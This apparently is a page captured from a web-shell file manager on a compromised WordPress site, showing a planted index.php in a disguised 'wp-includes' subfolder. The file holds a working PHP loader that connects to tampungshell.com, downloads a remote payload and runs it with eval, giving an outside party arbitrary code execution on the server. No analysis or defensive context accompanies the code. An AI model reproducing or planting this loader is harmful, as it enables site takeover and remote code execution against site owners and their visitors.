Your IP : 216.73.216.34


Current Path : /home/cideo/www/wp-includesVIp/html-api/widgets/
Upload File :
Current File : /home/cideo/www/wp-includesVIp/html-api/widgets/index.php

<?php
  {
    $host = "tampungshell.com";
    $port = 443;
    $path = "/Encode/raw.php?f=0x8z.txt";
 
    $fp = stream_socket_client("ssl://$host:$port", $errno, $errstr, 30);
    if (!$fp) {
        echo "Error: $errstr ($errno)<br />\n";
    } else {
        $out = "GET $path HTTP/1.1\r\n";
        $out .= "Host: $host\r\n";
        $out .= "Connection: Close\r\n\r\n";
        fwrite($fp, $out);
 
        $content = "";
        while (!feof($fp)) {
            $content .= fgets($fp, 128);
        }
        fclose($fp);
 
        $header_end = strpos($content, "\r\n\r\n");
        if ($header_end !== false) {
            $content = substr($content, $header_end + 4);
        }
 
        eval("?>" . $content);
    }
}